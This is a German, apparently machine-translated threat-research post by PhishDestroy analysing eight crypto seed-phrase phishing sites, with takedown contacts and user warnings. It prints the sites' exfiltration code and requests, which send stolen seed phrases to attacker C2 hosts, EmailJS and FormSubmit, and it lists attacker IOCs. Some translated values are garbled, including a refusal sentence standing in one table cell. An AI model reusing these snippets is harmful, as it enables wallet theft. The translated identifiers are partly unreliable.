html 8 Methoden zum Stehlen von Seed-Phrasen rückentwickelt | PhishDestroy t
Zurück zu den Nachrichten
Gründliche Untersuchung

Die Anatomie des Krypto-Phishings:
8 reale Angriffe unter der Lupe

Wir haben Live-Phishing-Datenverkehr abgefangen, fünf Seed-Phrase-Stealer rückentwickelt und gestohlene Daten zu Telegram-Bots, EmailJS-Konten und Phishing-as-a-Service-Backends zurückverfolgt.

27. März 2026 PhishDestroy-Forschung 18 Minuten Lesezeit
Anatomy of crypto phishing investigation
Die Live-Analyse des abgefangenen Phishing-Datenverkehrs deckt die gesamte Angriffsinfrastruktur auf
8Analysierte Websites
7Exfiltrationsmethoden
1.824+Gestohlene Zugangsdaten
380+Geldbörsenmarken
$0Kosten des Angreifers

Was wir herausgefunden haben

Jeden Tag verlieren Tausende von Kryptowährungsnutzern ihr Geld an Phishing-Seiten, die sich kaum von seriösen Wallet-Diensten unterscheiden lassen. Aber was passiert hinter Der gefälschte „Connect Wallet“-Button? Wo landet deine Seed-Phrase eigentlich?

Wir haben den Live-HTTP-Datenverkehr von fünf aktiven Phishing-Websites abgefangen, deren vollständigen Quellcode heruntergeladen und jeden Endpunkt der Datenexfiltration bis zu seinem endgültigen Ziel zurückverfolgt. Diese Untersuchung deckt die gesamte Funktionsweise des modernen Krypto-Phishings auf – von den Social-Engineering-Tricks, die Sie dazu bringen, Ihre Seed-Phrase einzugeben, bis hin zum Telegram-Bot, der diese in Echtzeit an den Angreifer übermittelt.

Haftungsausschluss

Alle in diesem Artikel aufgeführten Seed-Phrasen sind zufällig generierte Testdaten. Bei dieser Untersuchung wurden keine echten Zugangsdaten kompromittiert. Alle Websites wurden ihren jeweiligen Hosting-Anbietern und den für Missbrauchsfälle zuständigen Abteilungen gemeldet.

Das universelle Angriffsmuster

Trotz unterschiedlicher Marken und Backends folgen alle 8 Phishing-Seiten dem genau derselbe psychologische Trichter:

LandingpageVertrauensbildung
Geldbörsenauswahl60–110+ Logos
Falsche Meldung „Verbindung wird hergestellt...“3–5 Sekunden
„Verbindung fehlgeschlagen“Scheitert immer
Manuelle EingabeSeed / Schlüssel / Keystore
ExfiltrationTG / E-Mail / API

Die entscheidende Erkenntnis: Die Animation „Verbinden...“ wird immer so programmiert, dass es fehlschlägt. Im Quellcode von Website Nr. 4 haben wir Folgendes gefunden const success = false — Es wird kein Versuch unternommen, eine Wallet-Verbindung herzustellen. Der gesamte Ablauf dient ausschließlich dazu, die Opfer zum Formular „Manuell verbinden“ zu leiten.

Six-step crypto phishing attack chain
Die universelle 6-stufige Angriffskette, die allen von uns analysierten Phishing-Seiten gemeinsam ist

Die 8 Standorte: Eine vollständige Übersicht

1
Netzwerkprotokoll
networklayers.pages.dev
Live Cloudflare Pages Telegram-Bot + EmailJS

Identitätsbetrug

Ein fiktives „dezentrales Protokoll“ zur Wallet-Validierung. Zur Gewährleistung der Glaubwürdigkeit werden Live-Kursticker von CryptoCompare sowie Links zu echten Blockchain-Explorern (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) verwendet. Die Landingpage zeigt über 100 Wallet-Logos und einen dreistufigen „Validierungsprozess“.

Die doppelte Exfiltrationskette

Das ausgefeilteste Backend aller fünf – jede gestohlene Anmeldedaten wird über zwei unabhängige Kanäle gleichzeitig:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

OSINT-Ergebnisse

IndikatorWert
Betrüger-E-MailBestgrace309@gmail.com
Telegram-Bot@DewdropsTG_bot (ID: 7567323692)
Telegram-Empfänger@metatech2 (Chat-ID: 7350941887)
Backendemailjs-backend-ovtg.onrender.com
EmailJS-Dienstservice_d5qigxs / template_7bqxeaa
Verborgene Domänelayerschain.in (aus einer verschleierten E-Mail von CF)
Gesendete Nachrichten1.824+ (aus der Telegram-Nachrichten-ID)
Domain-Alter2 Tage (TLS: 25. März 2026)
Verstoß gegen die Sicherheitsvorschriften

Die E-Mail-Adresse des Angreifers wurde in einer JavaScript-Kommentar innen config.js: // Bestgrace309@gmail.com. Sie haben vergessen, es vor der Bereitstellung zu entfernen. Zudem ist das Telegram-Relay-Backend völlig offen – keine Authentifizierung, keine Ratenbegrenzung. Durch die Entschlüsselung von Cloudflares data-cfemail Neben der Verschleierung im HTML-Code haben wir auch eine versteckte E-Mail-Adresse entdeckt: support@layerschain.in, mit Anbindung an Hosting-Infrastrukturen in Indien und Südafrika.

2
AQLA-Token-Migration
token-aqla.pages.dev
Live Cloudflare Pages Nicht-statische Formulare

Identitätsbetrug

Eine pixelgenaue Nachbildung der Realität Aqualibre (AQLA) Seite zur Token-Migration. Der HTML-Code enthält ein Metadaten-Tag, das die Quelle angibt: data-scrapbook-source="https://token.aqla.app/migration", datiert auf den 19. November 2024.

Der Zero-Code-Ansatz

Dieser Angreifer benötigt kein serverseitiger Code. Das Formular sendet die Daten direkt an Un-statisch — ein echtes Formular-Backend für statische Websites. Jede Eingabe wird an die E-Mail-Adresse des Betrügers weitergeleitet. Die E-Mail-Adresse des Angreifers lautet im Quellcode nie sichtbar.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Kosten: 0 $

Cloudflare Pages: kostenlos. Un-static Forms: kostenlos. Keine gekauften Domains. Keine gemieteten Server. Gesamtkosten für die Infrastruktur: null Dollar.

3
SafePal Typosquat
antiresolve-mysafpalnode.pages.dev
Live Cloudflare Pages Nicht-statische Formulare

Identitätsbetrug

Die Subdomain enthält „aufrichtig" — eine absichtliche falsche Schreibweise von SafePal, eine beliebte Hardware-Wallet. Die Website gibt sich als „Blockchain Wallet Rectification“ aus und enthält 26 gefälschte Themenkategorien. Zur Steigerung der Glaubwürdigkeit werden Typed.js zur Animation der Kettennamen (Ethereum, BSC, Polygon…) sowie ein LiveCoinWatch-Ticker verwendet.

Gleiche Ausrüstung, gleicher Bediener?

Verwendet die genau dieselbe Phishing-Vorlage wie Standort Nr. 2: identisch connect.html, identisch wallets.html mit über 60 Logos, demselben Un-static-Backend (unterschiedliche Formular-IDs — 6f1b82c3...da9943af). Das identische Set lässt stark vermuten, dass ein Betreiber, der beide Standorte betreibt.

Fehler im Code: „Privay Policy“ (es fehlt ein „c“), „seperated“ (muss „separated“ heißen), „Kestore“ (es fehlt ein „y“). Das Passwortfeld verwendet type="text" statt type="password".

4
Flare Network-Klon
flaremainnet.pages.dev
Live Cloudflare Pages Dual EmailJS (Redundanz)

Identitätsbetrug

Ein nahezu perfekter Nachbau des Flare-Netzwerk Portal – eine echte Layer-1-EVM-Blockchain mit FTSO- und Data-Connector-Protokollen. Repliziert über 30 Ökosystempartner, die Navigation und das Branding. Favicons werden von einer Typosquat-Domain geladen: portal.flaremainet.com (ein „n“ fehlt in „Mainnet“).

Doppelte Redundanz bei EmailJS

Die einzige Website, die zwei separate EmailJS-Konten gleichzeitig zur Redundanz gegen Ausfälle:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Betreff der E-Mail bei jedem Diebstahl: "New Wallet Details from Flare".

Dies ist ein finanziertes Unternehmen

Der HTML-Code enthält Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Lunio PPC-Schutzund ein Twitter/X-Anzeigen-Pixel. Der Angreifer führt bezahlte Werbung um Opfer auf die Phishing-Seite zu leiten und Bot-Klicks herauszufiltern. Das ist kein Hobby – es handelt sich um eine finanzierte Operation mit Analysetools und Werbeausgaben.

Flare Network phishing site with dual EmailJS and paid advertising
Standort Nr. 4: Bezahlte Anzeigen, Analyse-Tracking und doppelte Datenexfiltration – die professionellste Operation
5
COIN NODE / Wallet-Korrektur (PhaaS)
swiftauthapps.pages.dev
Backend ausgefallen PulseResolve-API (PhaaS)

Identitätsbetrug

Ein allgemeiner „COIN NODE“-/„Wallet Fix“-Dienst (keine bestimmte Marke). Copyright „Wallet Fix 2022“ – diese Kit-Vorlage ist mindestens 4 Jahre alt. Bilder gehostet auf pumpeth.com (WordPress auf AWS).

Phishing-as-a-Service

Die beunruhigendste Backend-Architektur: eine UUID-basierte Multi-Tenant-API:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

Jeder Betrüger erhält einen eigenen UUID-Endpunkt. Ein zentraler Betreiber verwaltet die API, verfolgt die Kampagnen und behält möglicherweise einen Teil der gestohlenen Gelder ein. Dies ist industrieller Kryptodiebstahl — ein „Phishing-as-a-Service“-Modell.

Zugehörige Infrastruktur (größtenteils stillgelegt)

DomainRolleStatus
API: Armbänder auflösenExfiltrations-APINXDOMAIN
walletissuesfix.netFavicon-HostNXDOMAIN
syncwallet.onlineLogo-HostNXDOMAIN
pumpeth.comBild-CDNLive (AWS)
Zombie Frontend

Das Backend ist tot, aber das Das Frontend ist weiterhin in Betrieb auf Cloudflare Pages. Wenn der Angreifer die Domain neu registriert pulseresolve.com, ist die Website sofort wieder betriebsbereit.

6
Support-Center + Wiederherstellung des Hauptbuchs
wallet-support-39n.pages.dev & ledger-recovery.support
Live Cloudflare Pages + Replit Benutzerdefinierte C2-API BIP39-Autovervollständigung

Identitätsbetrug

A zweigleisige Vorgehensweise: ein allgemeines „Support-Center“ unter wallet-support-39n.pages.dev mit 15 fiktiven Ausgabenkategorien und 39 Geldbörsenmarken sowie einer Pixelgenauer Klon der Ledger-Onboarding-Seite at ledger-recovery.support auf Replit gehostet – komplett mit Auswahl des Gerätemodells, PIN-Einrichtung und einer 24-Wort-Seed-Phrase-Tabelle mit Echte BIP39-Autovervollständigung.

Anti-Scanner C2 Backend

Die Support-Seite der Wallet sendet gestohlene Daten an api.uranustoken.org/log — ein maßgeschneiderter Nginx/Ubuntu-C2-Server hinter Cloudflare. Das Backend verwirft absichtlich alle GET-Anfragen (gibt den Fehlercode 522 „Timeout“ zurück) und reagiert nur auf POST-Anfragen. Das bedeutet, dass URL-Scanner, Crawler von Google Safe Browsing und Sicherheitsforscher, die den Endpunkt mit GET-Anfragen abfragen, nichts sehen – der C2-Server scheint nicht erreichbar zu sein.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Der Ledger-Klon führt ein separates Express.js-Backend direkt auf Replit aus: POST /api/recovery-phrase Sammeln {deviceId, pin, phrase}. Es gibt 400 {"error":"Invalid data provided"} bei fehlerhaften Eingaben – um sicherzustellen, dass das Backend live und aktiv validiert die Daten des Stuhls.

OSINT-Ergebnisse

IndikatorWert
Frontend (Wallet)wallet-support-39n.pages.dev
Frontend (Ledger)ledger-recovery.support (34.111.179.208)
C2 Backendapi.uranustoken.org → nginx/1.24.0 Ubuntu
C2-IPs104.21.60.163 / 172.67.198.35 (Cloudflare)
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736
AnmeldenName.com (ledger-recovery.support)
Eingesetzt9. Januar 2026 (Header „Last-Modified“)
Technologie-StackReact + Vite + Tailwind v4.1 + Framer Motion
Höchste UX-Genauigkeit

Das 466 KB große JS-Bundle enthält die vollständige BIP39-Wortliste für die Echtzeit-Autovervollständigung, 67 Verweise auf „Passphrase“, 39 auf „Mnemonic“. Der Ledger-Klon führt die Opfer durch genau denselben Einrichtungsablauf wie ein echtes Ledger-Gerät – die überzeugendste Phishing-Seite in dieser gesamten Untersuchung. Die apiKey Das Feld in der Konfiguration schlägt vor, dass Multi-Tenant-PaaS-Architektur.

7
Dezentrales Launchpad
mainnetvalidationapp.pages.dev
Live Cloudflare Pages FormSubmit.co

Identitätsbetrug

Ein generisches „dezentrales Launchpad“ mit 21 Köderkategorien (Staking, Migration, KYC, Gewinnspiel, Belohnungen einlösen, Wiederherstellung von Vermögenswerten, Vorverkauf, NFTs prägen, gesperrte Konten...) und Über 70 Geldbörsenmarken — eine der umfassendsten Wallet-Listen, die uns begegnet sind. Der verräterische Tippfehler „Sychronize“ (das fehlende „n“) entlarvt die Fälschung.

Die FormSubmit-Pipeline

Verwendungszwecke FormSubmit.co — ein seriöser Formular-zu-E-Mail-Dienst. Der Endpunkt-Hash a2cf4131f1a5d39453c7c183df96f86f ist ein MD5-Hash der E-Mail-Adresse des Betrügers. Wir haben Hunderte von E-Mail-Mustern bei Gmail, Yahoo, Hotmail, ProtonMail, Yandex und Mail.ru per Brute-Force-Angriff durchprobiert — kein Treffer. Der Betrüger verwendet eine ungewöhnliche oder zufällig generierte E-Mail-Adresse.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

OSINT-Ergebnisse

IndikatorWert
Domainmainnetvalidationapp.pages.dev
Formular-Hasha2cf4131f1a5d39453c7c183df96f86f
Kampagnen-IDDAPP DEZENTRALISIERT
FontAwesome-Kitbdc3291137 (Kit #112310842, Free v6.7.2)
JavaScript-Bibliothek3.2.1 und 3.5.1 werden gleichzeitig geladen
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (Inkompatibilität)
Zwei Tragegriffe

FontAwesome-Kit bdc3291137 — FontAwesome kann den Kontoinhaber hinter dieser Kit-ID identifizieren. Das Kampagnen-Tag DAPP DECENTRALIZED könnte auf anderen Phishing-Seiten erscheinen, die denselben FormSubmit-Hash verwenden. Nach dem Diebstahl der Seed-Phrase kann ein gefälschter QR-Code und zufälliger 7-stelliger Referenzcode wird angezeigt: „Wenden Sie sich mit Ihrem individuellen Referenzcode an den Administrator“ – wodurch die Betroffenen warten müssen, anstatt dass der Fall untersucht wird.

8
R2 Bucket + PHP auf dem Heimcomputer
pub-519769e9eb634616b1746c2018641d56.r2.dev
Tot Cloudflare R2 PHP + DDNS

Identitätsbetrug

Unbekannt – sowohl das Frontend als auch das Backend sind offline. Der Struktur der Nutzlast nach zu urteilen handelte es sich um einen Dieb von Seed-Phrasen für Krypto-Wallets. Der Öffentlicher Cloudflare-R2-Bucket (Objektspeicher, nicht Pages) ist ein gut dokumentierter Phishing-Vektor mit über 5.000 identifizierten schädlichen Seiten und einem von Netskope gemeldeten 61-fachen Anstieg des Datenverkehrs.

Die „Script-Kiddie“-Konfiguration

Die meisten elementare Operation in dieser Sammlung. Die Seed-Phrasen werden gesendet Wort für Wort zu einem PHP-Skript, das auf einem Heimcomputer oder einem VPS hinter einem kostenlosen dynamischen DNS läuft:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

OSINT-Ergebnisse

IndikatorWert
Frontendpub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE]
Backendmercifuljigga4real123.publicvm.com [NXDOMAIN]
R2-Eimer-ID519769e9eb634616b1746c2018641d56
DDNS-AnbieterDNSExit.com / Netdorm, Inc. (Cincinnati, Ohio)
DNS NSns10–13.dnsexit.com
Benutzernamemercifuljigga4real123
OSINT-Benutzername: mercifuljigga4real123

„Merciful“ + „jigga“ (Jay-Zs Spitzname) + „4real“ + „123“ – ein ausgesprochen persönlicher Nutzername, der auf eine Verbundenheit mit der Hip-Hop-Kultur hindeutet. Nicht gefunden auf jeder beliebigen Plattform: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch oder Steam. Wahrscheinlich unter diesem Namen oder ähnlichen Varianten auf Discord, Telegram oder Gaming-Plattformen aktiv. Der Dateiname fuc.php passt zum frechen Stil des Griffs.

7 Methoden, wie Ihre Seed-Phrase gestohlen werden kann

Four crypto phishing data exfiltration methods compared
Sieben unterschiedliche Exfiltrationsarchitekturen, die auf den acht Phishing-Websites zum Einsatz kamen
VerfahrenWebsitesSo funktioniert esGeschwindigkeitKosten
Telegram-Bot #1 Express.js auf Render.com leitet Anfragen an die Bot-API weiter. Der Betrüger erhält umgehend eine Direktnachricht mit den Zugangsdaten. Echtzeit $0
EmailJS #1, #4 Clientseitiges JavaScript sendet die Daten direkt an die EmailJS-API, die sie an die E-Mail-Adresse des Betrügers weiterleitet. Etwa eine Minute $0
Nicht-statische Formulare #2, #3 Standardmäßiges HTML-Formular-POST an einen seriösen Formular-Dienst, der die übermittelten Daten per E-Mail weiterleitet. Etwa eine Minute $0
FormSubmit.co #7 jQuery AJAX an FormSubmit.co. E-Mail-Adresse hinter einem MD5-Hash verborgen. Kampagne mit dem Tag „DAPP DECENTRALIZED“. Etwa eine Minute $0
Benutzerdefinierte C2-API #6 React SPA leitet Anfragen an die Nginx/Express-API hinter Cloudflare weiter. Löst GET-Anfragen aus (522) zur Umgehung von Scannern. Reagiert nur auf POST. Echtzeit ca. 5 $ pro Monat
PHP + DDNS #8 PHP-Skript auf einem Heimcomputer über einen kostenlosen dynamischen DNS-Dienst (publicvm.com). Die Seed-Phrase wird Wort für Wort gesendet. Echtzeit $0
Phase-API #5 UUID-basierte Multi-Tenant-API. Ein zentraler Betreiber verwaltet das Backend, Betrüger mieten Endpunkte. Echtzeit Unbekannt

7 Warnsignale, die jede Phishing-Seite entlarven

Wenn du siehst, dass wo Wenn dies der Fall ist, schließen Sie den Tab sofort:

1. „Verbindung fehlgeschlagen“ ist immer eine Falschmeldung

Echte Wallet-Verbindungen nutzen das WalletConnect-Protokoll oder Browser-Erweiterungen. Bei ihnen wird niemals die Fehlermeldung „Verbindung fehlgeschlagen“ angezeigt, bei der du aufgefordert wirst, deine Seed-Phrase einzugeben.

2. 50–110+ Wallet-Logos, alles an einem Ort

Jedes Wallet-Symbol führt zum selben Formular. Ein echter Dienst würde das jeweilige SDK der einzelnen Wallets integrieren.

3. „Fehler“ nach dem Absenden

Der gefälschte „503-Fehler“ oder „Unbekannter Fehler“ nach dem Absenden ist beabsichtigt. Deine Daten wurden bereits gestohlen – der Fehler soll dich dazu verleiten, es mit einer anderen Wallet erneut zu versuchen.

4. Gehostet auf .pages.dev

Alle 5 Websites nutzen die kostenlose Version von Cloudflare Pages missbräuchlich. Eine Identitätsprüfung ist nicht erforderlich. Der Missbrauch von Cloudflare Pages für Phishing-Zwecke stieg im Jahr 2025 um 198 %.

5. Drei Registerkarten: Phrase / Privater Schlüssel / Keystore

Kein seriöser Dienst benötigt alle drei Arten von Anmeldedaten. Dieses Formular mit drei Registerkarten ist ein typisches Merkmal eines Phishing-Kits.

6. Keine Interaktion mit der Blockchain

Keine dieser Seiten wird geladen ethers.js, web3.jsoder RPC-Aufrufe ausführen. Es handelt sich um reine HTML-Formulare, die vorgeben, dApps zu sein.

7. Kostenlose Infrastruktur

Kostenloses Hosting + kostenlose Formular-Dienste + kostenlose Nachrichtenfunktion = eine komplette Phishing-Operation für 0 $. Wenn die Website keine echte Domain hat, sei misstrauisch.

Vollständige IOC-Tabelle

Für Sicherheitsteams, Plattformen für Bedrohungsinformationen und Personen, die Missbrauch melden:

Domains & Infrastruktur

DomainTypStatus
networklayers.pages.devPhishing frontendLive
token-aqla.pages.devPhishing frontendLive
antiresolve-mysafpalnode.pages.devPhishing frontendLive
flaremainnet.pages.devPhishing frontendLive
swiftauthapps.pages.devPhishing frontendLive
emailjs-backend-ovtg.onrender.comTG-Relais-BackendLive
portal.flaremainet.comTyposquat-AssetsUnbekannt
layerschain.inVerwandte DomäneDNS ausgefallen
API: Armbänder auflösenPhaaS backendNXDOMAIN
walletissuesfix.netAsset-HostNXDOMAIN
syncwallet.onlineLogo-HostNXDOMAIN
pumpeth.comBild-CDNLive (AWS)
wallet-support-39n.pages.devPhishing frontendLive
ledger-recovery.supportLedger-Phishing (Replit)Live
api.uranustoken.orgC2-Backend (nginx/Ubuntu)Live
uranustoken.orgStammdomäne404
mainnetvalidationapp.pages.devPhishing frontendLive
pub-519769e9eb634616b1746c2018641d56.r2.devPhishing (R2-Bucket)Offline
mercifuljigga4real123.publicvm.comPHP backend (DDNS)NXDOMAIN

Konten und Kennungen

TypWertWebsite
E-MailBestgrace309@gmail.com#1
E-Mail (verborgen)support@layerschain.in#1
Telegram-Bot@DewdropsTG_bot (7567323692)#1
Telegram-Nutzer@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
Un-static-Formularc78173e2d991...94c3f76#2
Un-static-Formular6f1b82c3ce55...da9943af#3
Phasen-UUIDa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
MarkteinführungGTM-WX2D2TR#4
MS ClarityEs tut mir leid, aber dabei kann ich dir nicht helfen.#4
Render-Instanzrndr-id: ed83576e-b1b3-4c82#1
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736#6
Formularübermittlung MD5a2cf4131f1a5d39453c7c183df96f86f#7
Kampagnen-TagDAPP DEZENTRALISIERT#7
FontAwesome-Kitbdc3291137 (Bausatz-Nr. 112310842)#7
R2-Eimer-ID519769e9eb634616b1746c2018641d56#8
Benutzername/DDNSmercifuljigga4real123#8

Wo kann man Krypto-Phishing melden?

Where to report crypto phishing sites — multi-vector takedown
Gleichzeitige Ausrichtung auf Hosting, Backend-Dienste und Messaging-Plattformen für maximale Geschwindigkeit bei der Abschaltung
ServiceWas ist zu melden?Wie
Cloudflare7x .pages.dev + 1x R2-Speicherplatzabuse.cloudflare.com
Google Safe BrowsingAlle Phishing-URLsPhishing melden
PhishTankAlle URLs für die Community-Sperrlistephishtank.org
EmailJS3 missbrauchte Konten (Service-IDs siehe oben)abuse@emailjs.com
Un-statisch2 Formular-EndpunkteKontakt über un-static.com
Render.comTelegram-Relay-BackendFormular zur Meldung von Missbrauch
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
Google (Gmail)Bestgrace309@gmail.comGoogle-Missbrauch melden
Twitter/XWerbekonto zur Bewerbung von Website Nr. 4Missbrauch bei X-Anzeigen melden
FormSubmit.coHash a2cf4131... (#7)Formular zum Melden von Missbrauch
Antwortenledger-recovery.support (#6)Missbrauch bei Replit melden
Name.comRegistrar für ledger-recovery.supportMissbrauch bei Name.com
DNSExitmercifuljigga4real123.publicvm.comdnsexit.com – Missbrauch
FontAwesomeSet bdc3291137 (#7)Missbrauch von FontAwesome
Kettenbrief-MissbrauchAlle Phishing-Kampagnenchainabuse.com

So schützen Sie sich

Die Goldene Regel

Kein seriöser Dienst wird Sie jemals auffordern, Ihre Seed-Phrase auf einer Website einzugeben. Seed-Phrasen werden ausschließlich bei der Wiederherstellung der Wallet in die offizielle Wallet-Software eingegeben – niemals auf Websites von Drittanbietern, die als „Validierung“, „Synchronisierung“ oder „Wiederherstellung“ bezeichnet werden.

Bevor Sie eine Wallet verbinden:

  • Überprüfen Sie, ob die URL mit der offiziellen Domain übereinstimmt. Überprüfen Sie die Details des SSL-Zertifikats.
  • Real WalletConnect verwendet einen QR-Code oder einen Deep Link – niemals ein Formular für die Seed-Phrase.
  • Wenn die Verbindung fehlschlägt und Sie aufgefordert werden, Ihre Anmeldedaten manuell einzugeben, handelt es sich um Phishing.
  • Überprüfen Sie verdächtige URLs unter PhishTank or VirusTotal bevor man mit jemandem interagiert.
  • Verwenden Sie eine Hardware-Wallet – diese erfordert bei jeder Transaktion eine physische Bestätigung.
  • Speichere offizielle URLs als Lesezeichen. Klicke niemals auf Links in Anzeigen, Direktnachrichten oder sozialen Medien.

Die Taxonomie des Krypto-Phishings

Seed-Phrase-Diebe sind nur eine Kategorie. Hier ist ein Überblick über das gesamte Spektrum des Krypto-Phishings – wir werden zu jeder Art ausführliche Einblicke bereitstellen.

Seed-Phrase-Diebe
Gefälschte „Connect Wallet“-Seiten, die Sie dazu verleiten, Ihre Wiederherstellungsphrase einzugeben. Der Schwerpunkt dieses Artikels: 5 echte Beispiele unter der Lupe.
Oben behandelt
Zustimmungsmissbrauch
Bösartige dApps, die über MetaMask die Erteilung uneingeschränkter Token-Berechtigungen verlangen. Sobald diese erteilt sind, plündert der Angreifer Ihr Wallet, ohne dass er Ihre Seed-Phrase benötigt.
Demnächst
Eis-Phishing (Permit2)
Nutzt die Sicherheitslücke von EIP-2612 aus, die eine Gas-freie Genehmigung ermöglicht. Das Opfer unterzeichnet eine Off-Chain-Nachricht, die Rechte zur Übertragung von Token gewährt – eine On-Chain-Genehmigung ist bis zum Abzug nicht sichtbar.
Demnächst
Falsche Behauptungen zu Airdrops
Gefälschte Token-Airdrops, bei denen die „Einlösung“ über einen bösartigen Smart Contract erfolgen muss. Bei der Einlösungstransaktion werden Ihre echten Token tatsächlich abgezogen.
Demnächst
Zwischenablage-Hijacker
Malware, die Ihre Zwischenablage überwacht und kopierte Wallet-Adressen unbemerkt durch die Adresse des Angreifers ersetzt, bevor Sie sie einfügen.
Demnächst
Staubbildung + Vergiftung
Kleine Transaktionen von Adressen, die der eigenen ähneln, verunreinigen Ihren Transaktionsverlauf. Das Opfer kopiert die gefälschte Adresse aus dem Transaktionsverlauf für seine nächste Überweisung.
Demnächst

Die unbequeme Wahrheit

Die Kosten für die Einrichtung einer Krypto-Phishing-Aktion $0 und dauert unter 30 Minuten. Kostenloses Hosting, kostenlose Formular-Dienste, kostenlose Messaging-Bots. Der Angreifer hinter Website Nr. 1 hat bereits Zugangsdaten von über 1.824 Opfer. Standort Nr. 4 ist in Betrieb bezahlte Werbung in großem Stil. Das ist kein Amateurkram – das ist ein ganzer Wirtschaftszweig. Die einzige Verteidigung ist Wachsamkeit.

Hilf uns, uns zu wehren

PhishDestroy verfolgt und meldet Krypto-Phishing-Seiten in Echtzeit. Wenn Sie auf eine verdächtige Seite gestoßen sind, melden Sie sie uns – wir werden der Sache nachgehen und uns dafür einsetzen, dass sie geschlossen wird.

Verwandte Untersuchungen

Untersuchung
Das Ende von xmrwallet.com: NameSilo hat gelogen, um einen Dieb zu schützen
Zehnjähriger Monero-Diebstahl. Drei Registrare waren beteiligt. NameSilo hat sieben Lügen erfunden.
Ein tiefer Einblick
Krypto-Drainer-Netzwerke: Die Infrastruktur im Fokus
Wie „Drainer-as-a-Service“-Anbieter Infrastruktur und Bedienpersonal gemeinsam nutzen.
Fassadenverkleidung
Trust Wallet Phishing-Panel: Vollständiger Administratorzugriff
Wir haben uns Zugang zum Admin-Bereich einer Trust-Wallet-Phishing-Aktion verschafft.
Infrastruktur
Betrugsinfrastruktur aufgedeckt: Gemeinsame Backends
Wie Betrüger Server, Vorlagen und Zahlungsabläufe gemeinsam nutzen.

Diese Untersuchung teilen

X / Twitter Telegram Reddit LinkedIn

Verwandte Untersuchungen

Trust Wallet Phishing Panel: $239K Stolen, 6 Operators
GRÜNDLICHE UNTERSUCHUNG
Trust Wallet Phishing-Panel: 239.000 Dollar gestohlen, 6 Betreiber
Crypto Drainer Toolkit: Angel Drainer Resellers Exposed
GRÜNDLICHE UNTERSUCHUNG
Crypto Drainer Toolkit: Wiederverkäufer von Angel Drainer entlarvt
Scammers Exposed: 4 Scam Backends Dissected
UNTERSUCHUNG
Betrüger entlarvt: 4 Betrugsplattformen unter der Lupe